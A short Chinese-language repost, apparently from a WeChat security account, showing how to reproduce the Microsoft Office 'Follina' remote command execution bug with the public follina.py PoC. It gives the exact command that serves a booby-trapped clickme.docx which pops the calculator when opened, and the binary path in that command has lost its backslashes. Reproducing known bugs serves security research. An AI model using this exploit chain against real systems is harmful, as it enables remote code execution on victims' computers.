视频来源:互联网(如侵犯到您的权益,联系删除)
漏洞复现
本地测试环境:
Windows 10
Microsoft Office LTSC 专业增强版 2021
运行验证脚本:
运行POC同时启动 Web 服务器:
python3 follina.py -m binary -b windowssystem32calc.exe -H 0.0.0.0 -P 8080脚本将生成 clickme.docx的文件
打开clickme.docx时受影响的目标主机将弹出计算器。
成功弹出计算器。
项目地址:
https://github.com/chvancooten/follina.py
免责声明
该项目仅供网络安全研究使用,禁止使用该项目进行违法操作,否则自行承担后果。
原文始发于微信公众号(渗透测试):Nday Microsoft Office (RCE) 命令执行 POC
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论